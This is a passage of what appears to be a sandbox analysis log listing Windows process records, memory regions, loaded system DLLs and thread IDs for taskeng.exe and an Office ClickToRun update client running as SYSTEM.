SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xe], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b1b3" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]
Region:
id = 1966
start_va = 0x7ffe0000
end_va = 0x7ffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1967
start_va = 0x6a6db20000
end_va = 0x6a6db3ffff
entry_point = 0x0
region_type = private
name = "private_0x0000006a6db20000"
filename = ""
Region:
id = 1968
start_va = 0x6a6db40000
end_va = 0x6a6db53fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000006a6db40000"
filename = ""
Region:
id = 1969
start_va = 0x6a6db60000
end_va = 0x6a6dbdffff
entry_point = 0x0
region_type = private
name = "private_0x0000006a6db60000"
filename = ""
Region:
id = 1970
start_va = 0x6a6dbe0000
end_va = 0x6a6dbe3fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000006a6dbe0000"
filename = ""
Region:
id = 1971
start_va = 0x6a6dbf0000
end_va = 0x6a6dbf0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000006a6dbf0000"
filename = ""
Region:
id = 1972
start_va = 0x6a6dc00000
end_va = 0x6a6dc01fff
entry_point = 0x0
region_type = private
name = "private_0x0000006a6dc00000"
filename = ""
Region:
id = 1973
start_va = 0x7df5ff5f0000
end_va = 0x7ff5ff5effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ff5f0000"
filename = ""
Region:
id = 1974
start_va = 0x7ff6df0f0000
end_va = 0x7ff6df112fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007ff6df0f0000"
filename = ""
Region:
id = 1975
start_va = 0x7ff6df119000
end_va = 0x7ff6df119fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6df119000"
filename = ""
Region:
id = 1976
start_va = 0x7ff6df11e000
end_va = 0x7ff6df11ffff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6df11e000"
filename = ""
Region:
id = 1977
start_va = 0x7ff6df2f0000
end_va = 0x7ff6df33cfff
entry_point = 0x7ff6df2f0000
region_type = mapped_file
name = "taskeng.exe"
filename = "\\Windows\\System32\\taskeng.exe" (normalized: "c:\\windows\\system32\\taskeng.exe")
Region:
id = 1978
start_va = 0x7ffb3d310000
end_va = 0x7ffb3d4d1fff
entry_point = 0x7ffb3d310000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1979
start_va = 0x6a6db20000
end_va = 0x6a6db2ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000006a6db20000"
filename = ""
Region:
id = 1980
start_va = 0x6a6dc10000
end_va = 0x6a6dccdfff
entry_point = 0x6a6dc10000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1981
start_va = 0x6a6dd80000
end_va = 0x6a6de7ffff
entry_point = 0x0
region_type = private
name = "private_0x0000006a6dd80000"
filename = ""
Region:
id = 1982
start_va = 0x7ff6deff0000
end_va = 0x7ff6df0effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007ff6deff0000"
filename = ""
Region:
id = 1983
start_va = 0x7ffb3a800000
end_va = 0x7ffb3a9dcfff
entry_point = 0x7ffb3a800000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1984
start_va = 0x7ffb3d260000
end_va = 0x7ffb3d30cfff
entry_point = 0x7ffb3d260000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1985
start_va = 0x6a6db30000
end_va = 0x6a6db36fff
entry_point = 0x0
region_type = private
name = "private_0x0000006a6db30000"
filename = ""
Region:
id = 1986
start_va = 0x6a6dcd0000
end_va = 0x6a6dd4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000006a6dcd0000"
filename = ""
Region:
id = 1987
start_va = 0x6a6dd50000
end_va = 0x6a6dd56fff
entry_point = 0x0
region_type = private
name = "private_0x0000006a6dd50000"
filename = ""
Region:
id = 1988
start_va = 0x6a6dd60000
end_va = 0x6a6dd60fff
entry_point = 0x6a6dd60000
region_type = mapped_file
name = "taskeng.exe.mui"
filename = "\\Windows\\System32\\en-US\\TaskEng.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskeng.exe.mui")
Region:
id = 1989
start_va = 0x6a6dd70000
end_va = 0x6a6dd70fff
entry_point = 0x0
region_type = private
name = "private_0x0000006a6dd70000"
filename = ""
Region:
id = 1990
start_va = 0x6a6de80000
end_va = 0x6a6de80fff
entry_point = 0x0
region_type = private
name = "private_0x0000006a6de80000"
filename = ""
Region:
id = 1991
start_va = 0x6a6de90000
end_va = 0x6a6df0ffff
entry_point = 0x0
region_type = private
name = "private_0x0000006a6de90000"
filename = ""
Region:
id = 1992
start_va = 0x6a6df10000
end_va = 0x6a6df1ffff
entry_point = 0x0
region_type = private
name = "private_0x0000006a6df10000"
filename = ""
Region:
id = 1993
start_va = 0x6a6df20000
end_va = 0x6a6e0a7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000006a6df20000"
filename = ""
Region:
id = 1994
start_va = 0x6a6e0b0000
end_va = 0x6a6e0b0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000006a6e0b0000"
filename = ""
Region:
id = 1995
start_va = 0x6a6e110000
end_va = 0x6a6e11ffff
entry_point = 0x0
region_type = private
name = "private_0x0000006a6e110000"
filename = ""
Region:
id = 1996
start_va = 0x6a6e120000
end_va = 0x6a6e2a0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000006a6e120000"
filename = ""
Region:
id = 1997
start_va = 0x6a6e2b0000
end_va = 0x6a6e36ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000006a6e2b0000"
filename = ""
Region:
id = 1998
start_va = 0x6a6e370000
end_va = 0x6a6e46ffff
entry_point = 0x0
region_type = private
name = "private_0x0000006a6e370000"
filename = ""
Region:
id = 1999
start_va = 0x6a6e470000
end_va = 0x6a6e7a6fff
entry_point = 0x6a6e470000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 2000
start_va = 0x6a6e7b0000
end_va = 0x6a6e82ffff
entry_point = 0x0
region_type = private
name = "private_0x0000006a6e7b0000"
filename = ""
Region:
id = 2001
start_va = 0x6a6e830000
end_va = 0x6a6e8affff
entry_point = 0x0
region_type = private
name = "private_0x0000006a6e830000"
filename = ""
Region:
id = 2002
start_va = 0x6a6e8b0000
end_va = 0x6a6e92ffff
entry_point = 0x0
region_type = private
name = "private_0x0000006a6e8b0000"
filename = ""
Region:
id = 2003
start_va = 0x7ff6df113000
end_va = 0x7ff6df114fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6df113000"
filename = ""
Region:
id = 2004
start_va = 0x7ff6df115000
end_va = 0x7ff6df116fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6df115000"
filename = ""
Region:
id = 2005
start_va = 0x7ff6df117000
end_va = 0x7ff6df118fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6df117000"
filename = ""
Region:
id = 2006
start_va = 0x7ff6df11a000
end_va = 0x7ff6df11bfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6df11a000"
filename = ""
Region:
id = 2007
start_va = 0x7ff6df11c000
end_va = 0x7ff6df11dfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6df11c000"
filename = ""
Region:
id = 2008
start_va = 0x7ffb35de0000
end_va = 0x7ffb35de8fff
entry_point = 0x7ffb35de0000
region_type = mapped_file
name = "tschannel.dll"
filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll")
Region:
id = 2009
start_va = 0x7ffb39260000
end_va = 0x7ffb39292fff
entry_point = 0x7ffb39260000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2010
start_va = 0x7ffb39610000
end_va = 0x7ffb39626fff
entry_point = 0x7ffb39610000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 2011
start_va = 0x7ffb39780000
end_va = 0x7ffb3978afff
entry_point = 0x7ffb39780000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 2012
start_va = 0x7ffb39960000
end_va = 0x7ffb3998bfff
entry_point = 0x7ffb39960000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 2013
start_va = 0x7ffb39b60000
end_va = 0x7ffb39b87fff
entry_point = 0x7ffb39b60000
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 2014
start_va = 0x7ffb39b90000
end_va = 0x7ffb39bfafff
entry_point = 0x7ffb39b90000
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 2015
start_va = 0x7ffb39d60000
end_va = 0x7ffb39d6efff
entry_point = 0x7ffb39d60000
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 2016
start_va = 0x7ffb3bf80000
end_va = 0x7ffb3c0a5fff
entry_point = 0x7ffb3bf80000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2017
start_va = 0x7ffb3c2d0000
end_va = 0x7ffb3c375fff
entry_point = 0x7ffb3c2d0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2018
start_va = 0x7ffb3c3e0000
end_va = 0x7ffb3c564fff
entry_point = 0x7ffb3c3e0000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2019
start_va = 0x7ffb3c650000
end_va = 0x7ffb3c79dfff
entry_point = 0x7ffb3c650000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2020
start_va = 0x7ffb3c950000
end_va = 0x7ffb3c9aafff
entry_point = 0x7ffb3c950000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2021
start_va = 0x7ffb3c9b0000
end_va = 0x7ffb3ca6dfff
entry_point = 0x7ffb3c9b0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2022
start_va = 0x7ffb3ca70000
end_va = 0x7ffb3cb14fff
entry_point = 0x7ffb3ca70000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 2023
start_va = 0x7ffb3cc70000
end_va = 0x7ffb3ceebfff
entry_point = 0x7ffb3cc70000
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 2024
start_va = 0x7ffb3cf10000
end_va = 0x7ffb3cfacfff
entry_point = 0x7ffb3cf10000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Thread:
id = 216
os_tid = 0xd0c
Thread:
id = 217
os_tid = 0x33c
Thread:
id = 218
os_tid = 0x8b4
Thread:
id = 219
os_tid = 0x468
Thread:
id = 220
os_tid = 0x9d8
Thread:
id = 221
os_tid = 0xd68
Thread:
id = 222
os_tid = 0xcdc
Thread:
id = 223
os_tid = 0xd04
Thread:
id = 224
os_tid = 0xd30
Thread:
id = 234
os_tid = 0xe3c
Process:
id = "15"
image_name = "officec2rclient.exe"
filename = "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe"
page_root = "0x617bd000"
os_pid = "0xe78"
os_integrity_level = "0x4000"
os_privileges = "0xe60b1e890"
monitor_reason = "child_process"
parent_id = "14"
os_parent_pid = "0xae8"
cmd_line = "\"C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\" /update SCHEDULEDTASK displaylevel=False"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\SYSTEM"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xe], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b1b3" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]
Region:
id = 2026
start_va = 0x7ffe0000
end_va = 0x7ffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2027
start_va = 0xe7b28e0000
end_va = 0xe7b28fffff
entry_point = 0x0
region_type = private
name = "private_0x000000e7b28e0000"
filename = ""
Region:
id = 2028
start_va = 0xe7b2900000
end_va = 0xe7b2913fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000e7b2900000"
filename = ""
Region:
id = 2029
start_va = 0xe7b2920000
end_va = 0xe7b2a1ffff
entry_point = 0x0
region_type = private
name = "private_0x000000e7b2920000"
filename = ""
Region:
id = 2030
start_va = 0xe7b2a20000
end_va = 0xe7b2a23fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000e7b2a20000"
filename = ""
Region:
id = 2031
start_va = 0x7ff6e56f0000
end_va = 0x7ff6e5712fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007ff6e56f0000"
filename = ""
Region:
id = 2032
start_va = 0x7ff6e5718000
end_va = 0x7ff6e5718fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6e5718000"
filename = ""
Region:
id = 2033
start_va = 0x7ff6e571e000
end_va = 0x7ff6e571ffff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6e571e000"
filename = ""
Region:
id = 2034
start_va = 0x7ff6e5db0000
end_va = 0x7ff6e6363fff
entry_point = 0x7ff6e5db0000
region_type = mapped_file
name = "officec2rclient.exe"
filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe")
Region:
id = 2035
start_va = 0x7ffb3d310000
end_va = 0x7ffb3d4d1fff
entry_point = 0x7ffb3d310000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2036
start_va = 0xe7b28e0000
end_va = 0xe7b28effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000e7b28e0000"
filename = ""
Region:
id = 2037
start_va = 0xe7b2a30000
end_va = 0xe7b2a30fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000e7b2a30000"
filename = ""
Region:
id = 2038
start_va = 0xe7b2a40000
end_va = 0xe7b2a41fff
entry_point = 0x0
region_type = private
name = "private_0x000000e7b2a40000"
filename = ""
Region:
id = 2039
start_va = 0xe7b2af0000
end_va = 0xe7b2beffff
entry_point = 0x0
region_type = private
name = "private_0x000000e7b2af0000"
filename = ""
Region:
id = 2040
start_va = 0xe7b2bf0000
end_va = 0xe7b2cadfff
entry_point = 0xe7b2bf0000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2041
start_va = 0x7ff6e55f0000
end_va = 0x7ff6e56effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007ff6e55f0000"
filename = ""
Region:
id = 2042
start_va = 0x7ffb3a800000
end_va = 0x7ffb3a9dcfff
entry_point = 0x7ffb3a800000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2043
start_va = 0x7ffb3d260000
end_va = 0x7ffb3d30cfff
entry_point = 0x7ffb3d260000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2044
start_va = 0xe7b28f0000
end_va = 0xe7b28f6fff
entry_point = 0x0
region_type = private
name = "private_0x000000e7b28f0000"
filename = ""
Region:
id = 2045
start_va = 0xe7b2a50000
end_va = 0xe7b2a56fff
entry_point = 0x0
region_type = private
name = "private_0x000000e7b2a50000"
filename = ""
Region:
id = 2046
start_va = 0xe7b2a60000
end_va = 0xe7b2a60fff
entry_point = 0x0
region_type = private
name = "private_0x000000e7b2a60000"
filename = ""
Region:
id = 2047
start_va = 0xe7b2a70000
end_va = 0xe7b2a70fff
entry_point = 0x0
region_type = private
name = "private_0x000000e7b2a70000"
filename = ""
Region:
id = 2048
start_va = 0xe7b2ac0000
end_va = 0xe7b2acffff
entry_point = 0x0
region_type = private
name = "private_0x000000e7b2ac0000"
filename = ""
Region:
id = 2049
start_va = 0xe7b2cb0000
end_va = 0xe7b2daffff
entry_point = 0x0
region_type = private
name = "private_0x000000e7b2cb0000"
filename = ""
Region:
id = 2050
start_va = 0xe7b2db0000
end_va = 0xe7b2f37fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000e7b2db0000"
filename = ""
Region:
id = 2051
start_va = 0xe7b2f40000
end_va = 0xe7b30c0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000e7b2f40000"
filename = ""
Region:
id = 2052
start_va = 0xe7b30d0000
end_va = 0xe7b318ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000e7b30d0000"
filename = ""
Region:
id = 2053
start_va = 0x7ff6e571c000
end_va = 0x7ff6e571dfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6e571c000"
filename = ""
Region:
id = 2054
start_va = 0x7ffb251d0000
end_va = 0x7ffb2526dfff
entry_point = 0x7ffb251d0000
region_type = mapped_file
name = "wer.dll"
filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll")
Region:
id = 2055
start_va = 0x7ffb34f70000
end_va = 0x7ffb34f99fff
entry_point = 0x7ffb34f70000
region_type = mapped_file
name = "apiclient.dll"
filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\apiclient.dll")
Region:
id = 2056
start_va = 0x7ffb34fe0000
end_va = 0x7ffb3507dfff
entry_point = 0x7ffb34fe0000
region_type = mapped_file
name = "msvcp140.dll"
filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp140.dll")
Region:
id = 2057
start_va = 0x7ffb35080000
end_va = 0x7ffb35096fff
entry_point = 0x7ffb35080000
region_type = mapped_file
name = "vcruntime140.dll"
filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vcruntime140.dll")
Region:
id = 2058
start_va = 0x7ffb35bc0000
end_va = 0x7ffb35cb1fff
entry_point = 0x7ffb35bc0000
region_type = mapped_file
name = "ucrtbase.dll"
filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll")
Region:
id = 2059
start_va = 0x7ffb39780000
end_va = 0x7ffb3978afff
entry_point = 0x7ffb39780000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 2060
start_va = 0x7ffb39b90000
end_va = 0x7ffb39bfafff
entry_point = 0x7ffb39b90000
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 2061
start_va = 0x7ffb3bf80000
end_va = 0x7ffb3c0a5fff
entry_point = 0x7ffb3bf80000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2062
start_va = 0x7ffb3c2d0000
end_va = 0x7ffb3c375fff
entry_point = 0x7ffb3c2d0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2063
start_va = 0x7ffb3c3e0000
end_va = 0x7ffb3c564fff
entry_point = 0x7ffb3c3e0000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2064
start_va = 0x7ffb3c650000
end_va = 0x7ffb3c79dfff
entry_point = 0x7ffb3c650000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2065
start_va = 0x7ffb3c950000
end_va = 0x7ffb3c9aafff
entry_point = 0x7ffb3c950000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2066
start_va = 0x7ffb3c9b0000
end_va = 0x7ffb3ca6dfff
entry_point = 0x7ffb3c9b0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2067
start_va = 0x7ffb3cb20000
end_va = 0x7ffb3cc60fff
entry_point = 0x7ffb3cb20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2068
start_va = 0x7ffb3cc70000
end_va = 0x7ffb3ceebfff
entry_point = 0x7ffb3cc70000
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 2069
start_va = 0x7ffb3cf10000
end_va = 0x7ffb3cfacfff
entry_point = 0x7ffb3cf10000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2070
start_va = 0xe7b2a80000
end_va = 0xe7b2a8ffff
entry_point = 0x0
region_type = private
name = "private_0x000000e7b2a80000"
filename = ""
Region:
id = 2071
start_va = 0xe7b2a90000
end_va = 0xe7b2a90fff
entry_point = 0x0
region_type = private
name = "private_0x000000e7b2a90000"
filename = ""
Region:
id = 2072
start_va = 0xe7b2aa0000
end_va = 0xe7b2aa0fff
entry_point = 0x0
region_type = private
name = "private_0x000000e7b2aa0000"
filename = ""
Region:
id = 2073
start_va = 0xe7b3190000
end_va = 0xe7b34c6fff
entry_point = 0xe7b3190000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 2074
start_va = 0xe7b3670000
end_va = 0xe7b367ffff
entry_point = 0x0
region_type = private
name = "private_0x000000e7b3670000"
filename = ""
Region:
id = 2075
start_va = 0x7ffb25580000
end_va = 0x7ffb25629fff
entry_point = 0x7ffb25580000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_0212ec7eba871e86\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_0212ec7eba871e86\\comctl32.dll")
Region:
id = 2076
start_va = 0xe7b2ab0000
end_va = 0xe7b2ab2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000e7b2ab0000"
filename = ""
Region:
id = 2077
start_va = 0x7ffb349b0000
end_va = 0x7ffb34cb3fff
entry_point = 0x7ffb349b0000
region_type = mapped_file
name = "mso20win32client.dll"
filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso20win32client.dll")
Region:
id = 2078
start_va = 0xe7b2ad0000
end_va = 0xe7b2adffff
entry_point = 0x0
region_type = private
name = "private_0x000000e7b2ad0000"
filename = ""
Region:
id = 2079
start_va = 0xe7b2ae0000
end_va = 0xe7b2ae2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000e7b2ae0000"
filename = ""
Region:
id = 2080
start_va = 0x7ffb34530000
end_va = 0x7ffb349a7fff
entry_point = 0x7ffb34530000
region_type = mapped_file
name = "mso30win32client.dll"
filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso30win32client.dll")
Region:
id = 2081
start_va = 0xe7b34d0000
end_va = 0xe7b34d2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000e7b34d0000"
filename = ""
Region:
id = 2082
start_va = 0x7ffb33a90000
end_va = 0x7ffb33c38fff
entry_point = 0x7ffb33a90000
region_type = mapped_file
name = "gdiplus.dll"
filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10240.16384_none_89a94c179af51f83\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10240.16384_none_89a94c179af51f83\\gdiplus.dll")
Region:
id = 2083
start_va = 0x7ffb33c40000
end_va = 0x7ffb3452afff
entry_point = 0x7ffb33c40000
region_type = mapped_file
name = "mso40uiwin32client.dll"
filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uiwin32client.dll")
Region:
id = 2084
start_va = 0xe7b34e0000
end_va = 0xe7b35dffff
entry_point = 0x0
region_type = private
name = "private_0x000000e7b34e0000"
filename = ""
Region:
id = 2085
start_va = 0xe7b35e0000
end_va = 0xe7b35e1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000e7b35e0000"
filename = ""
Region:
id = 2086
start_va = 0x7ff6e571a000
end_va = 0x7ff6e571bfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6e571a000"
filename = ""
Region:
id = 2087
start_va = 0x7ffb33750000
end_va = 0x7ffb33a8cfff
entry_point = 0x7ffb33750000
region_type = mapped_file
name = "msi.dll"
filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll")
Region:
id = 2088
start_va = 0x7ffb39b60000
end_va = 0x7ffb39b87fff
